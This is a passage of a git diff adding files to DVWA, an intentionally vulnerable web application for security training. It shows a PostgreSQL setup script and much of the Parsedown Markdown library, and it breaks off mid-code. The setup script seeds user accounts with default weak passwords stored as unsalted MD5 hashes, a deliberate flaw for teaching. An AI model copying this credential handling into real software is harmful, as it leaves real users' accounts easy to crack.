SQL: " . pg_last_error() ); + dvwaPageReload(); +} + +$create_tb = "CREATE TABLE users (user_id integer UNIQUE, first_name text, last_name text, username text, password text, avatar text, PRIMARY KEY (user_id));"; + +if( !pg_query( $create_tb ) ) { + dvwaMessagePush( "Table could not be created
SQL: " . pg_last_error() ); + dvwaPageReload(); +} + +dvwaMessagePush( "'users' table was created." ); + +// Get the base directory for the avatar media... +$baseUrl = 'http://'.$_SERVER[ 'SERVER_NAME' ].$_SERVER[ 'PHP_SELF' ]; +$stripPos = strpos( $baseUrl, 'dvwa/setup.php' ); +$baseUrl = substr( $baseUrl, 0, $stripPos ).'dvwa/hackable/users/'; + +$insert = "INSERT INTO users VALUES + ('1','admin','admin','admin',MD5('password'),'{$baseUrl}admin.jpg'), + ('2','Gordon','Brown','gordonb',MD5('abc123'),'{$baseUrl}gordonb.jpg'), + ('3','Hack','Me','1337',MD5('charley'),'{$baseUrl}1337.jpg'), + ('4','Pablo','Picasso','pablo',MD5('letmein'),'{$baseUrl}pablo.jpg'), + ('5','bob','smith','smithy',MD5('password'),'{$baseUrl}smithy.jpg');"; +if( !pg_query( $insert ) ) { + dvwaMessagePush( "Data could not be inserted into 'users' table
SQL: " . pg_last_error() ); + dvwaPageReload(); +} + +dvwaMessagePush( "Data inserted into 'users' table." ); + +// Create guestbook table + +$drop_table = "DROP table IF EXISTS guestbook;"; + +if( !@pg_query($drop_table) ) { + dvwaMessagePush( "Could not drop existing users table
SQL: " . pg_last_error() ); + dvwaPageReload(); +} + +$create_tb_guestbook = "CREATE TABLE guestbook (comment text, name text, comment_id SERIAL PRIMARY KEY);"; + +if( !pg_query( $create_tb_guestbook ) ) { + dvwaMessagePush( "guestbook table could not be created
SQL: " . pg_last_error() ); + dvwaPageReload(); +} + +dvwaMessagePush( "'guestbook' table was created." ); + +// Insert data into 'guestbook' +$insert = "INSERT INTO guestbook (comment, name) VALUES('This is a test comment.','admin')"; + +if( !pg_query( $insert ) ) { + dvwaMessagePush( "Data could not be inserted into 'guestbook' table
SQL: " . pg_last_error() ); + dvwaPageReload(); +} +dvwaMessagePush( "Data inserted into 'guestbook' table." ); + +dvwaMessagePush( "Setup successful!" ); +dvwaPageReload(); + +pg_close($dbconn); + +?> diff --git a/DVWA/dvwa/includes/Parsedown.php b/DVWA/dvwa/includes/Parsedown.php new file mode 100644 index 00000000..ae0cbdec --- /dev/null +++ b/DVWA/dvwa/includes/Parsedown.php @@ -0,0 +1,1994 @@ +textElements($text); + + # convert to markup + $markup = $this->elements($Elements); + + # trim line breaks + $markup = trim($markup, "\n"); + + return $markup; + } + + protected function textElements($text) + { + # make sure no definitions are set + $this->DefinitionData = array(); + + # standardize line breaks + $text = str_replace(array("\r\n", "\r"), "\n", $text); + + # remove surrounding line breaks + $text = trim($text, "\n"); + + # split text into lines + $lines = explode("\n", $text); + + # iterate through lines to identify blocks + return $this->linesElements($lines); + } + + # + # Setters + # + + function setBreaksEnabled($breaksEnabled) + { + $this->breaksEnabled = $breaksEnabled; + + return $this; + } + + protected $breaksEnabled; + + function setMarkupEscaped($markupEscaped) + { + $this->markupEscaped = $markupEscaped; + + return $this; + } + + protected $markupEscaped; + + function setUrlsLinked($urlsLinked) + { + $this->urlsLinked = $urlsLinked; + + return $this; + } + + protected $urlsLinked = true; + + function setSafeMode($safeMode) + { + $this->safeMode = (bool) $safeMode; + + return $this; + } + + protected $safeMode; + + function setStrictMode($strictMode) + { + $this->strictMode = (bool) $strictMode; + + return $this; + } + + protected $strictMode; + + protected $safeLinksWhitelist = array( + 'http://', + 'https://', + 'ftp://', + 'ftps://', + 'mailto:', + 'tel:', + 'data:image/png;base64,', + 'data:image/gif;base64,', + 'data:image/jpeg;base64,', + 'irc:', + 'ircs:', + 'git:', + 'ssh:', + 'news:', + 'steam:', + ); + + # + # Lines + # + + protected $BlockTypes = array( + '#' => array('Header'), + '*' => array('Rule', 'List'), + '+' => array('List'), + '-' => array('SetextHeader', 'Table', 'Rule', 'List'), + '0' => array('List'), + '1' => array('List'), + '2' => array('List'), + '3' => array('List'), + '4' => array('List'), + '5' => array('List'), + '6' => array('List'), + '7' => array('List'), + '8' => array('List'), + '9' => array('List'), + ':' => array('Table'), + '<' => array('Comment', 'Markup'), + '=' => array('SetextHeader'), + '>' => array('Quote'), + '[' => array('Reference'), + '_' => array('Rule'), + '`' => array('FencedCode'), + '|' => array('Table'), + '~' => array('FencedCode'), + ); + + # ~ + + protected $unmarkedBlockTypes = array( + 'Code', + ); + + # + # Blocks + # + + protected function lines(array $lines) + { + return $this->elements($this->linesElements($lines)); + } + + protected function linesElements(array $lines) + { + $Elements = array(); + $CurrentBlock = null; + + foreach ($lines as $line) + { + if (chop($line) === '') + { + if (isset($CurrentBlock)) + { + $CurrentBlock['interrupted'] = (isset($CurrentBlock['interrupted']) + ? $CurrentBlock['interrupted'] + 1 : 1 + ); + } + + continue; + } + + while (($beforeTab = strstr($line, "\t", true)) !== false) + { + $shortage = 4 - mb_strlen($beforeTab, 'utf-8') % 4; + + $line = $beforeTab + . str_repeat(' ', $shortage) + . substr($line, strlen($beforeTab) + 1) + ; + } + + $indent = strspn($line, ' '); + + $text = $indent > 0 ? substr($line, $indent) : $line; + + # ~ + + $Line = array('body' => $line, 'indent' => $indent, 'text' => $text); + + # ~ + + if (isset($CurrentBlock['continuable'])) + { + $methodName = 'block' . $CurrentBlock['type'] . 'Continue'; + $Block = $this->$methodName($Line, $CurrentBlock); + + if (isset($Block)) + { + $CurrentBlock = $Block; + + continue; + } + else + { + if ($this->isBlockCompletable($CurrentBlock['type'])) + { + $methodName = 'block' . $CurrentBlock['type'] . 'Complete'; + $CurrentBlock = $this->$methodName($CurrentBlock); + } + } + } + + # ~ + + $marker = $text[0]; + + # ~ + + $blockTypes = $this->unmarkedBlockTypes; + + if (isset($this->BlockTypes[$marker])) + { + foreach ($this->BlockTypes[$marker] as $blockType) + { + $blockTypes []= $blockType; + } + } + + # + # ~ + + foreach ($blockTypes as $blockType) + { + $Block = $this->{"block$blockType"}($Line, $CurrentBlock); + + if (isset($Block)) + { + $Block['type'] = $blockType; + + if ( ! isset($Block['identified'])) + { + if (isset($CurrentBlock)) + { + $Elements[] = $this->extractElement($CurrentBlock); + } + + $Block['identified'] = true; + } + + if ($this->isBlockContinuable($blockType)) + { + $Block['continuable'] = true; + } + + $CurrentBlock = $Block; + + continue 2; + } + } + + # ~ + + if (isset($CurrentBlock) and $CurrentBlock['type'] === 'Paragraph') + { + $Block = $this->paragraphContinue($Line, $CurrentBlock); + } + + if (isset($Block)) + { + $CurrentBlock = $Block; + } + else + { + if (isset($CurrentBlock)) + { + $Elements[] = $this->extractElement($CurrentBlock); + } + + $CurrentBlock = $this->paragraph($Line); + + $CurrentBlock['identified'] = true; + } + } + + # ~ + + if (isset($CurrentBlock['continuable']) and $this->isBlockCompletable($CurrentBlock['type'])) + { + $methodName = 'block' . $CurrentBlock['type'] . 'Complete'; + $CurrentBlock = $this->$methodName($CurrentBlock); + } + + # ~ + + if (isset($CurrentBlock)) + { + $Elements[] = $this->extractElement($CurrentBlock); + } + + # ~ + + return $Elements; + } + + protected function extractElement(array $Component) + { + if ( ! isset($Component['element'])) + { + if (isset($Component['markup'])) + { + $Component['element'] = array('rawHtml' => $Component['markup']); + } + elseif (isset($Component['hidden'])) + { + $Component['element'] = array(); + } + } + + return $Component['element']; + } + + protected function isBlockContinuable($Type) + { + return method_exists($this, 'block' . $Type . 'Continue'); + } + + protected function isBlockCompletable($Type) + { + return method_exists($this, 'block' . $Type . 'Complete'); + } + + # + # Code + + protected function blockCode($Line, $Block = null) + { + if (isset($Block) and $Block['type'] === 'Paragraph' and ! isset($Block['interrupted'])) + { + return; + } + + if ($Line['indent'] >= 4) + { + $text = substr($Line['body'], 4); + + $Block = array( + 'element' => array( + 'name' => 'pre', + 'element' => array( + 'name' => 'code', + 'text' => $text, + ), + ), + ); + + return $Block; + } + } + + protected function blockCodeContinue($Line, $Block) + { + if ($Line['indent'] >= 4) + { + if (isset($Block['interrupted'])) + { + $Block['element']['element']['text'] .= str_repeat("\n", $Block['interrupted']); + + unset($Block['interrupted']); + } + + $Block['element']['element']['text'] .= "\n"; + + $text = substr($Line['body'], 4); + + $Block['element']['element']['text'] .= $text; + + return $Block; + } + } + + protected function blockCodeComplete($Block) + { + return $Block; + } + + # + # Comment + + protected function blockComment($Line) + { + if ($this->markupEscaped or $this->safeMode) + { + return; + } + + if (strpos($Line['text'], '') !== false) + { + $Block['closed'] = true; + } + + return $Block; + } + } + + protected function blockCommentContinue($Line, array $Block) + { + if (isset($Block['closed'])) + { + return; + } + + $Block['element']['rawHtml'] .= "\n" . $Line['body']; + + if (strpos($Line['text'], '-->') !== false) + { + $Block['closed'] = true; + } + + return $Block; + } + + # + # Fenced Code + + protected function blockFencedCode($Line) + { + $marker = $Line['text'][0]; + + $openerLength = strspn($Line['text'], $marker); + + if ($openerLength < 3) + { + return; + } + + $infostring = trim(substr($Line['text'], $openerLength), "\t "); + + if (strpos($infostring, '`') !== false) + { + return; + } + + $Element = array( + 'name' => 'code', + 'text' => '', + ); + + if ($infostring !== '') + { + /** + * https://www.w3.org/TR/2011/WD-html5-20110525/elements.html#classes + * Every HTML element may have a class attribute specified. + * The attribute, if specified, must have a value that is a set + * of space-separated tokens representing the various classes + * that the element belongs to. + * [...] + * The space characters, for the purposes of this specification, + * are U+0020 SPACE, U+0009 CHARACTER TABULATION (tab), + * U+000A LINE FEED (LF), U+000C FORM FEED (FF), and + * U+000D CARRIAGE RETURN (CR). + */ + $language = substr($infostring, 0, strcspn($infostring, " \t\n\f\r")); + + $Element['attributes'] = array('class' => "language-$language"); + } + + $Block = array( + 'char' => $marker, + 'openerLength' => $openerLength, + 'element' => array( + 'name' => 'pre', + 'element' => $Element, + ), + ); + + return $Block; + } + + protected function blockFencedCodeContinue($Line, $Block) + { + if (isset($Block['complete'])) + { + return; + } + + if (isset($Block['interrupted'])) + { + $Block['element']['element']['text'] .= str_repeat("\n", $Block['interrupted']); + + unset($Block['interrupted']); + } + + if (($len = strspn($Line['text'], $Block['char'])) >= $Block['openerLength'] + and chop(substr($Line['text'], $len), ' ') === '' + ) { + $Block['element']['element']['text'] = substr($Block['element']['element']['text'], 1); + + $Block['complete'] = true; + + return $Block; + } + + $Block['element']['element']['text'] .= "\n" . $Line['body']; + + return $Block; + } + + protected function blockFencedCodeComplete($Block) + { + return $Block; + } + + # + # Header + + protected function blockHeader($Line) + { + $level = strspn($Line['text'], '#'); + + if ($level > 6) + { + return; + } + + $text = trim($Line['text'], '#'); + + if ($this->strictMode and isset($text[0]) and $text[0] !== ' ') + { + return; + } + + $text = trim($text, ' '); + + $Block = array( + 'element' => array( + 'name' => 'h' . $level, + 'handler' => array( + 'function' => 'lineElements', + 'argument' => $text, + 'destination' => 'elements', + ) + ), + ); + + return $Block; + } + + # + # List + + protected function blockList($Line, array $CurrentBlock = null) + { + list($name, $pattern) = $Line['text'][0] <= '-' ? array('ul', '[*+-]') : array('ol', '[0-9]{1,9}+[.\)]'); + + if (preg_match('/^('.$pattern.'([ ]++|$))(.*+)/', $Line['text'], $matches)) + { + $contentIndent = strlen($matches[2]); + + if ($contentIndent >= 5) + { + $contentIndent -= 1; + $matches[1] = substr($matches[1], 0, -$contentIndent); + $matches[3] = str_repeat(' ', $contentIndent) . $matches[3]; + } + elseif ($contentIndent === 0) + { + $matches[1] .= ' '; + } + + $markerWithoutWhitespace = strstr($matches[1], ' ', true); + + $Block = array( + 'indent' => $Line['indent'], + 'pattern' => $pattern, + 'data' => array( + 'type' => $name, + 'marker' => $matches[1], + 'markerType' => ($name === 'ul' ? $markerWithoutWhitespace : substr($markerWithoutWhitespace, -1)), + ), + 'element' => array( + 'name' => $name, + 'elements' => array(), + ), + ); + $Block['data']['markerTypeRegex'] = preg_quote($Block['data']['markerType'], '/'); + + if ($name === 'ol') + { + $listStart = ltrim(strstr($matches[1], $Block['data']['markerType'], true), '0') ?: '0'; + + if ($listStart !== '1') + { + if ( + isset($CurrentBlock) + and $CurrentBlock['type'] === 'Paragraph' + and ! isset($CurrentBlock['interrupted']) + ) { + return; + } + + $Block['element']['attributes'] = array('start' => $listStart); + } + } + + $Block['li'] = array( + 'name' => 'li', + 'handler' => array( + 'function' => 'li', + 'argument' => !empty($matches[3]) ? array($matches[3]) : array(), + 'destination' => 'elements' + ) + ); + + $Block['element']['elements'] []= & $Block['li']; + + return $Block; + } + } + + protected function blockListContinue($Line, array $Block) + { + if (isset($Block['interrupted']) and empty($Block['li']['handler']['argument'])) + { + return null; + } + + $requiredIndent = ($Block['indent'] + strlen($Block['data']['marker'])); + + if ($Line['indent'] < $requiredIndent + and ( + ( + $Block['data']['type'] === 'ol' + and preg_match('/^[0-9]++'.$Block['data']['markerTypeRegex'].'(?:[ ]++(.*)|$)/', $Line['text'], $matches) + ) or ( + $Block['data']['type'] === 'ul' + and preg_match('/^'.$Block['data']['markerTypeRegex'].'(?:[ ]++(.*)|$)/', $Line['text'], $matches) + ) + ) + ) { + if (isset($Block['interrupted'])) + { + $Block['li']['handler']['argument'] []= ''; + + $Block['loose'] = true; + + unset($Block['interrupted']); + } + + unset($Block['li']); + + $text = isset($matches[1]) ? $matches[1] : ''; + + $Block['indent'] = $Line['indent']; + + $Block['li'] = array( + 'name' => 'li', + 'handler' => array( + 'function' => 'li', + 'argument' => array($text), + 'destination' => 'elements' + ) + ); + + $Block['element']['elements'] []= & $Block['li']; + + return $Block; + } + elseif ($Line['indent'] < $requiredIndent and $this->blockList($Line)) + { + return null; + } + + if ($Line['text'][0] === '[' and $this->blockReference($Line)) + { + return $Block; + } + + if ($Line['indent'] >= $requiredIndent) + { + if (isset($Block['interrupted'])) + { + $Block['li']['handler']['argument'] []= ''; + + $Block['loose'] = true; + + unset($Block['interrupted']); + } + + $text = substr($Line['body'], $requiredIndent); + + $Block['li']['handler']['argument'] []= $text; + + return $Block; + } + + if ( ! isset($Block['interrupted'])) + { + $text = preg_replace('/^[ ]{0,'.$requiredIndent.'}+/', '', $Line['body']); + + $Block['li']['handler']['argument'] []= $text; + + return $Block; + } + } + + protected function blockListComplete(array $Block) + { + if (isset($Block['loose'])) + { + foreach ($Block['element']['elements'] as &$li) + { + if (end($li['handler']['argument']) !== '') + { + $li['handler']['argument'] []= ''; + } + } + } + + return $Block; + } + + # + # Quote + + protected function blockQuote($Line) + { + if (preg_match('/^>[ ]?+(.*+)/', $Line['text'], $matches)) + { + $Block = array( + 'element' => array( + 'name' => 'blockquote', + 'handler' => array( + 'function' => 'linesElements', + 'argument' => (array) $matches[1], + 'destination' => 'elements', + ) + ), + ); + + return $Block; + } + } + + protected function blockQuoteContinue($Line, array $Block) + { + if (isset($Block['interrupted'])) + { + return; + } + + if ($Line['text'][0] === '>' and preg_match('/^>[ ]?+(.*+)/', $Line['text'], $matches)) + { + $Block['element']['handler']['argument'] []= $matches[1]; + + return $Block; + } + + if ( ! isset($Block['interrupted'])) + { + $Block['element']['handler']['argument'] []= $Line['text']; + + return $Block; + } + } + + # + # Rule + + protected function blockRule($Line) + { + $marker = $Line['text'][0]; + + if (substr_count($Line['text'], $marker) >= 3 and chop($Line['text'], " $marker") === '') + { + $Block = array( + 'element' => array( + 'name' => 'hr', + ), + ); + + return $Block; + } + } + + # + # Setext + + protected function blockSetextHeader($Line, array $Block = null) + { + if ( ! isset($Block) or $Block['type'] !== 'Paragraph' or isset($Block['interrupted'])) + { + return; + } + + if ($Line['indent'] < 4 and chop(chop($Line['text'], ' '), $Line['text'][0]) === '') + { + $Block['element']['name'] = $Line['text'][0] === '=' ? 'h1' : 'h2'; + + return $Block; + } + } + + # + # Markup + + protected function blockMarkup($Line) + { + if ($this->markupEscaped or $this->safeMode) + { + return; + } + + if (preg_match('/^<[\/]?+(\w*)(?:[ ]*+'.$this->regexHtmlAttribute.')*+[ ]*+(\/)?>/', $Line['text'], $matches)) + { + $element = strtolower($matches[1]); + + if (in_array($element, $this->textLevelElements)) + { + return; + } + + $Block = array( + 'name' => $matches[1], + 'element' => array( + 'rawHtml' => $Line['text'], + 'autobreak' => true, + ), + ); + + return $Block; + } + } + + protected function blockMarkupContinue($Line, array $Block) + { + if (isset($Block['closed']) or isset($Block['interrupted'])) + { + return; + } + + $Block['element']['rawHtml'] .= "\n" . $Line['body']; + + return $Block; + } + + # + # Reference + + protected function blockReference($Line) + { + if (strpos($Line['text'], ']') !== false + and preg_match('/^\[(.+?)\]:[ ]*+?(?:[ ]+["\'(](.+)["\')])?[ ]*+$/', $Line['text'], $matches) + ) { + $id = strtolower($matches[1]); + + $Data = array( + 'url' => $matches[2], + 'title' => isset($matches[3]) ? $matches[3] : null, + ); + + $this->DefinitionData['Reference'][$id] = $Data; + + $Block = array( + 'element' => array(), + ); + + return $Block; + } + } + + # + # Table + + protected function blockTable($Line, array $Block = null) + { + if ( ! isset($Block) or $Block['type'] !== 'Paragraph' or isset($Block['interrupted'])) + { + return; + } + + if ( + strpos($Block['element']['handler']['argument'], '|') === false + and strpos($Line['text'], '|') === false + and strpos($Line['text'], ':') === false + or strpos($Block['element']['handler']['argument'], "\n") !== false + ) { + return; + } + + if (chop($Line['text'], ' -:|') !== '') + { + return; + } + + $alignments = array(); + + $divider = $Line['text']; + + $divider = trim($divider); + $divider = trim($divider, '|'); + + $dividerCells = explode('|', $divider); + + foreach ($dividerCells as $dividerCell) + { + $dividerCell = trim($dividerCell); + + if ($dividerCell === '') + { + return; + } + + $alignment = null; + + if ($dividerCell[0] === ':') + { + $alignment = 'left'; + } + + if (substr($dividerCell, - 1) === ':') + { + $alignment = $alignment === 'left' ? 'center' : 'right'; + } + + $alignments []= $alignment; + } + + # ~ + + $HeaderElements = array(); + + $header = $Block['element']['handler']['argument']; + + $header = trim($header); + $header = trim($header, '|'); + + $headerCells = explode('|', $header); + + if (count($headerCells) !== count($alignments)) + { + return; + } + + foreach ($headerCells as $index => $headerCell) + { + $headerCell = trim($headerCell); + + $HeaderElement = array( + 'name' => 'th', + 'handler' => array( + 'function' => 'lineElements', + 'argument' => $headerCell, + 'destination' => 'elements', + ) + ); + + if (isset($alignments[$index])) + { + $alignment = $alignments[$index]; + + $HeaderElement['attributes'] = array( + 'style' => "text-align: $alignment;", + ); + } + + $HeaderElements []= $HeaderElement; + } + + # ~ + + $Block = array( + 'alignments' => $alignments, + 'identified' => true, + 'element' => array( + 'name' => 'table', + 'elements' => array(), + ), + ); + + $Block['element']['elements'] []= array( + 'name' => 'thead', + ); + + $Block['element']['elements'] []= array( + 'name' => 'tbody', + 'elements' => array(), + ); + + $Block['element']['elements'][0]['elements'] []= array( + 'name' => 'tr', + 'elements' => $HeaderElements, + ); + + return $Block; + } + + protected function blockTableContinue($Line, array $Block) + { + if (isset($Block['interrupted'])) + { + return; + } + + if (count($Block['alignments']) === 1 or $Line['text'][0] === '|' or strpos($Line['text'], '|')) + { + $Elements = array(); + + $row = $Line['text']; + + $row = trim($row); + $row = trim($row, '|'); + + preg_match_all('/(?:(\\\\[|])|[^|`]|`[^`]++`|`)++/', $row, $matches); + + $cells = array_slice($matches[0], 0, count($Block['alignments'])); + + foreach ($cells as $index => $cell) + { + $cell = trim($cell); + + $Element = array( + 'name' => 'td', + 'handler' => array( + 'function' => 'lineElements', + 'argument' => $cell, + 'destination' => 'elements', + ) + ); + + if (isset($Block['alignments'][$index])) + { + $Element['attributes'] = array( + 'style' => 'text-align: ' . $Block['alignments'][$index] . ';', + ); + } + + $Elements []= $Element; + } + + $Element = array( + 'name' => 'tr', + 'elements' => $Elements, + ); + + $Block['element']['elements'][1]['elements'] []= $Element; + + return $Block; + } + } + + # + # ~ + # + + protected function paragraph($Line) + { + return array( + 'type' => 'Paragraph', + 'element' => array( + 'name' => 'p', + 'handler' => array( + 'function' => 'lineElements', + 'argument' => $Line['text'], + 'destination' => 'elements', + ), + ), + ); + } + + protected function paragraphContinue($Line, array $Block) + { + if (isset($Block['interrupted'])) + { + return; + } + + $Block['element']['handler']['argument'] .= "\n".$Line['text']; + + return $Block; + } + + # + # Inline Elements + # + + protected $InlineTypes = array( + '!' => array('Image'), + '&' => array('SpecialCharacter'), + '*' => array('Emphasis'), + ':' => array('Url'), + '<' => array('UrlTag', 'EmailTag', 'Markup'), + '[' => array('Link'), + '_' => array('Emphasis'), + '`' => array('Code'), + '~' => array('Strikethrough'), + '\\' => array('EscapeSequence'), + ); + + # ~ + + protected $inlineMarkerList = '!*_&[:<`~\\'; + + # + # ~ + # + + public function line($text, $nonNestables = array()) + { + return $this->elements($this->lineElements($text, $nonNestables)); + } + + protected function lineElements($text, $nonNestables = array()) + { + # standardize line breaks + $text = str_replace(array("\r\n", "\r"), "\n", $text); + + $Elements = array(); + + $nonNestables = (empty($nonNestables) + ? array() + : array_combine($nonNestables, $nonNestables) + ); + + # $excerpt is based on the first occurrence of a marker + + while ($excerpt = strpbrk($text, $this->inlineMarkerList)) + { + $marker = $excerpt[0]; + + $markerPosition = strlen($text) - strlen($excerpt); + + $Excerpt = array('text' => $excerpt, 'context' => $text); + + foreach ($this->InlineTypes[$marker] as $inlineType) + { + # check to see if the current inline type is nestable in the current context + + if (isset($nonNestables[$inlineType])) + { + continue; + } + + $Inline = $this->{"inline$inlineType"}($Excerpt); + + if ( ! isset($Inline)) + { + continue; + } + + # makes sure that the inline belongs to "our" marker + + if (isset($Inline['position']) and $Inline['position'] > $markerPosition) + { + continue; + } + + # sets a default inline position + + if ( ! isset($Inline['position'])) + { + $Inline['position'] = $markerPosition; + } + + # cause the new element to 'inherit' our non nestables + + + $Inline['element']['nonNestables'] = isset($Inline['element']['nonNestables']) + ? array_merge($Inline['element']['nonNestables'], $nonNestables) + : $nonNestables + ; + + # the text that comes before the inline + $unmarkedText = substr($text, 0, $Inline['position']); + + # compile the unmarked text + $InlineText = $this->inlineText($unmarkedText); + $Elements[] = $InlineText['element']; + + # compile the inline + $Elements[] = $this->extractElement($Inline); + + # remove the examined text + $text = substr($text, $Inline['position'] + $Inline['extent']); + + continue 2; + } + + # the marker does not belong to an inline + + $unmarkedText = substr($text, 0, $markerPosition + 1); + + $InlineText = $this->inlineText($unmarkedText); + $Elements[] = $InlineText['element']; + + $text = substr($text, $markerPosition + 1); + } + + $InlineText = $this->inlineText($text); + $Elements[] = $InlineText['element']; + + foreach ($Elements as &$Element) + { + if ( ! isset($Element['autobreak'])) + { + $Element['autobreak'] = false; + } + } + + return $Elements; + } + + # + # ~ + # + + protected function inlineText($text) + { + $Inline = array( + 'extent' => strlen($text), + 'element' => array(), + ); + + $Inline['element']['elements'] = self::pregReplaceElements( + $this->breaksEnabled ? '/[ ]*+\n/' : '/(?:[ ]*+\\\\|[ ]{2,}+)\n/', + array( + array('name' => 'br'), + array('text' => "\n"), + ), + $text + ); + + return $Inline; + } + + protected function inlineCode($Excerpt) + { + $marker = $Excerpt['text'][0]; + + if (preg_match('/^(['.$marker.']++)[ ]*+(.+?)[ ]*+(? strlen($matches[0]), + 'element' => array( + 'name' => 'code', + 'text' => $text, + ), + ); + } + } + + protected function inlineEmailTag($Excerpt) + { + $hostnameLabel = '[a-zA-Z0-9](?:[a-zA-Z0-9-]{0,61}[a-zA-Z0-9])?'; + + $commonMarkEmail = '[a-zA-Z0-9.!#$%&\'*+\/=?^_`{|}~-]++@' + . $hostnameLabel . '(?:\.' . $hostnameLabel . ')*'; + + if (strpos($Excerpt['text'], '>') !== false + and preg_match("/^<((mailto:)?$commonMarkEmail)>/i", $Excerpt['text'], $matches) + ){ + $url = $matches[1]; + + if ( ! isset($matches[2])) + { + $url = "mailto:$url"; + } + + return array( + 'extent' => strlen($matches[0]), + 'element' => array( + 'name' => 'a', + 'text' => $matches[1], + 'attributes' => array( + 'href' => $url, + ), + ), + ); + } + } + + protected function inlineEmphasis($Excerpt) + { + if ( ! isset($Excerpt['text'][1])) + { + return; + } + + $marker = $Excerpt['text'][0]; + + if ($Excerpt['text'][1] === $marker and preg_match($this->StrongRegex[$marker], $Excerpt['text'], $matches)) + { + $emphasis = 'strong'; + } + elseif (preg_match($this->EmRegex[$marker], $Excerpt['text'], $matches)) + { + $emphasis = 'em'; + } + else + { + return; + } + + return array( + 'extent' => strlen($matches[0]), + 'element' => array( + 'name' => $emphasis, + 'handler' => array( + 'function' => 'lineElements', + 'argument' => $matches[1], + 'destination' => 'elements', + ) + ), + ); + } + + protected function inlineEscapeSequence($Excerpt) + { + if (isset($Excerpt['text'][1]) and in_array($Excerpt['text'][1], $this->specialCharacters)) + { + return array( + 'element' => array('rawHtml' => $Excerpt['text'][1]), + 'extent' => 2, + ); + } + } + + protected function inlineImage($Excerpt) + { + if ( ! isset($Excerpt['text'][1]) or $Excerpt['text'][1] !== '[') + { + return; + } + + $Excerpt['text']= substr($Excerpt['text'], 1); + + $Link = $this->inlineLink($Excerpt); + + if ($Link === null) + { + return; + } + + $Inline = array( + 'extent' => $Link['extent'] + 1, + 'element' => array( + 'name' => 'img', + 'attributes' => array( + 'src' => $Link['element']['attributes']['href'], + 'alt' => $Link['element']['handler']['argument'], + ), + 'autobreak' => true, + ), + ); + + $Inline['element']['attributes'] += $Link['element']['attributes']; + + unset($Inline['element']['attributes']['href']); + + return $Inline; + } + + protected function inlineLink($Excerpt) + { + $Element = array( + 'name' => 'a', + 'handler' => array( + 'function' => 'lineElements', + 'argument' => null, + 'destination' => 'elements', + ), + 'nonNestables' => array('Url', 'Link'), + 'attributes' => array( + 'href' => null, + 'title' => null, + ), + ); + + $extent = 0; + + $remainder = $Excerpt['text']; + + if (preg_match('/\[((?:[^][]++|(?R))*+)\]/', $remainder, $matches)) + { + $Element['handler']['argument'] = $matches[1]; + + $extent += strlen($matches[0]); + + $remainder = substr($remainder, $extent); + } + else + { + return; + } + + if (preg_match('/^[(]\s*+((?:[^ ()]++|[(][^ )]+[)])++)(?:[ ]+("[^"]*+"|\'[^\']*+\'))?\s*+[)]/', $remainder, $matches)) + { + $Element['attributes']['href'] = $matches[1]; + + if (isset($matches[2])) + { + $Element['attributes']['title'] = substr($matches[2], 1, - 1); + } + + $extent += strlen($matches[0]); + } + else + { + if (preg_match('/^\s*\[(.*?)\]/', $remainder, $matches)) + { + $definition = strlen($matches[1]) ? $matches[1] : $Element['handler']['argument']; + $definition = strtolower($definition); + + $extent += strlen($matches[0]); + } + else + { + $definition = strtolower($Element['handler']['argument']); + } + + if ( ! isset($this->DefinitionData['Reference'][$definition])) + { + return; + } + + $Definition = $this->DefinitionData['Reference'][$definition]; + + $Element['attributes']['href'] = $Definition['url']; + $Element['attributes']['title'] = $Definition['title']; + } + + return array( + 'extent' => $extent, + 'element' => $Element, + ); + } + + protected function inlineMarkup($Excerpt) + { + if ($this->markupEscaped or $this->safeMode or strpos($Excerpt['text'], '>') === false) + { + return; + } + + if ($Excerpt['text'][1] === '/' and preg_match('/^<\/\w[\w-]*+[ ]*+>/s', $Excerpt['text'], $matches)) + { + return array( + 'element' => array('rawHtml' => $matches[0]), + 'extent' => strlen($matches[0]), + ); + } + + if ($Excerpt['text'][1] === '!' and preg_match('/^/s', $Excerpt['text'], $matches)) + { + return array( + 'element' => array('rawHtml' => $matches[0]), + 'extent' => strlen($matches[0]), + ); + } + + if ($Excerpt['text'][1] !== ' ' and preg_match('/^<\w[\w-]*+(?:[ ]*+'.$this->regexHtmlAttribute.')*+[ ]*+\/?>/s', $Excerpt['text'], $matches)) + { + return array( + 'element' => array('rawHtml' => $matches[0]), + 'extent' => strlen($matches[0]), + ); + } + } + + protected function inlineSpecialCharacter($Excerpt) + { + if (substr($Excerpt['text'], 1, 1) !== ' ' and strpos($Excerpt['text'], ';') !== false + and preg_match('/^&(#?+[0-9a-zA-Z]++);/', $Excerpt['text'], $matches) + ) { + return array( + 'element' => array('rawHtml' => '&' . $matches[1] . ';'), + 'extent' => strlen($matches[0]), + ); + } + + return; + } + + protected function inlineStrikethrough($Excerpt) + { + if ( ! isset($Excerpt['text'][1])) + { + return; + } + + if ($Excerpt['text'][1] === '~' and preg_match('/^~~(?=\S)(.+?)(?<=\S)~~/', $Excerpt['text'], $matches)) + { + return array( + 'extent' => strlen($matches[0]), + 'element' => array( + 'name' => 'del', + 'handler' => array( + 'function' => 'lineElements', + 'argument' => $matches[1], + 'destination' => 'elements', + ) + ), + ); + } + } + + protected function inlineUrl($Excerpt) + { + if ($this->urlsLinked !== true or ! isset($Excerpt['text'][2]) or $Excerpt['text'][2] !== '/') + { + return; + } + + if (strpos($Excerpt['context'], 'http') !== false + and preg_match('/\bhttps?+:[\/]{2}[^\s<]+\b\/*+/ui', $Excerpt['context'], $matches, PREG_OFFSET_CAPTURE) + ) { + $url = $matches[0][0]; + + $Inline = array( + 'extent' => strlen($matches[0][0]), + 'position' => $matches[0][1], + 'element' => array( + 'name' => 'a', + 'text' => $url, + 'attributes' => array( + 'href' => $url, + ), + ), + ); + + return $Inline; + } + } + + protected function inlineUrlTag($Excerpt) + { + if (strpos($Excerpt['text'], '>') !== false and preg_match('/^<(\w++:\/{2}[^ >]++)>/i', $Excerpt['text'], $matches)) + { + $url = $matches[1]; + + return array( + 'extent' => strlen($matches[0]), + 'element' => array( + 'name' => 'a', + 'text' => $url, + 'attributes' => array( + 'href' => $url, + ), + ), + ); + } + } + + # ~ + + protected function unmarkedText($text) + { + $Inline = $this->inlineText($text); + return $this->element($Inline['element']); + } + + # + # Handlers + # + + protected function handle(array $Element) + { + if (isset($Element['handler'])) + { + if (!isset($Element['nonNestables'])) + { + $Element['nonNestables'] = array(); + } + + if (is_string($Element['handler'])) + { + $function = $Element['handler']; + $argument = $Element['text']; + unset($Element['text']); + $destination = 'rawHtml'; + } + else + { + $function = $Element['handler']['function']; + $argument = 